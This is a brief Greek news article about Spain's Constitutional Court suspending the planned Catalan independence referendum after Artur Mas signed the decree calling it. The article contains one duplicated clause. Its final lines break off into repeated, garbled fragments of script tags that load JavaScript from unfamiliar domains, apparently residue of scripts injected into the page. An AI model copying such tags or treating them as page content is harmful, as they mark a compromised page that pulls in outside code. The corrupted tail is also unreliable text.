Ισπανία: Παράνομο το δημοψήφισμα για την ανεξαρτητοποίηση της Καταλονίας

 Ισπανία: Παράνομο το δημοψήφισμα για την ανεξαρτητοποίηση της Καταλονίας

Παράνομο κρίθηκε από το Συνταγματικό Δικαστήριο της Ισπανίας το δημοψήφισμα για την ανεξαρτητοποίηση της περιφέρειας της Καταλονίας.

Το δικαστήριο αφού αποδέχθηκε την προσφυγή που υπέβαλε σε αυτό η ισπανική κυβέρνηση, συγκλήθηκε εκτάκτως την Δευτέρα και η απόφαση που εξέδωσε σημαίνει την αυτόματη αναστολή ,σημαίνει ότι αυτόματα αναστέλλεται η διεξαγωγή του δημοψηφίσματος, ενώ το δικαστήριο αναμένεται να αποφανθεί εις βάθος για το θέμα σε διάστημα έως πέντε μήνες.

Μόλις το Σάββατο ο πρόεδρος της κυβέρνησης της Καταλονίας Αρτούρ Μας υπέγραψε ένα διάταγμα για τη διεξαγωγή του δημοψηφίσματος στις 9 Νοεμβρίου.

Την Κυριακή η καταλανική κυβέρνηση έδωσε το σήμα για να αρχίσουν οι προετοιμασίες για το δημοψήφισμα, καθώς η επίσημη εκστρατεία δεν πρόκειται να αρχίσει παρά στις 2 Νοεμβρίου.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >